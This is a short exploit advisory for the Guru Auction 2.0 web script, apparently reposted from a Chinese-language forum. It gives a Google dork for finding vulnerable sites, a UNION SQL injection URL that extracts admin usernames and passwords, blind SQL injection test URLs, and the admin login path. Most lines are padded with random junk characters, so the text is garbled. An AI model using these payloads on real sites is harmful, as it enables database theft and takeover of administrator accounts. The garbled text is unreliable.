Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
$ R7 M+ V1 w/ |( C# x
. B/ h9 a' [0 k* Y" {0 b作者 : v3n0m
" I% r( s: P# W4 n M9 e t% m应用 : Guru Auction 2.0
+ j3 E$ S9 Q. I/ C3 MPrice : $49. c- {( v$ J9 `( b. Y6 B! g
Vendor : http://www.guruscript.com/
, Z4 }7 s, |% g" `1 {% P! sGoogle Dork : inurl:subcat.php?cate_id=
5 [- ^/ [# r4 `; H P 6 L9 I B; B: u1 K# O6 n
SQLi p0c:
- ]% }$ A( _- O" s~~~~~~~~~~
) X$ K% A/ y( s: K# o( T( `5 x& ]+ j/ Rhttp://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
3 J" U; p4 `* Y5 c# Q6 } u9 K
$ t) k9 D4 L6 a; S Y; ] ) O, P( C5 P$ B5 ^: P/ H( m* g
盲注 p0c:
3 g/ T6 `4 E5 z$ Z~~~~~~~~~~
& P( q1 g# b" K: vhttp://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
- V4 w" M6 N0 Z0 l4 mhttp://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false" k* I! B7 I" G3 i" B7 Z4 z3 X
7 }" i. m& ~( u1 }3 F
管理登录入口:: P8 n5 g! [6 n' o3 o
~~~~~~~~~~
8 ^4 D9 _# j) _' u0 v7 b thttp://domain.tld/[path]/admin/ Q8 {% u! x' I/ f7 s# A# N
|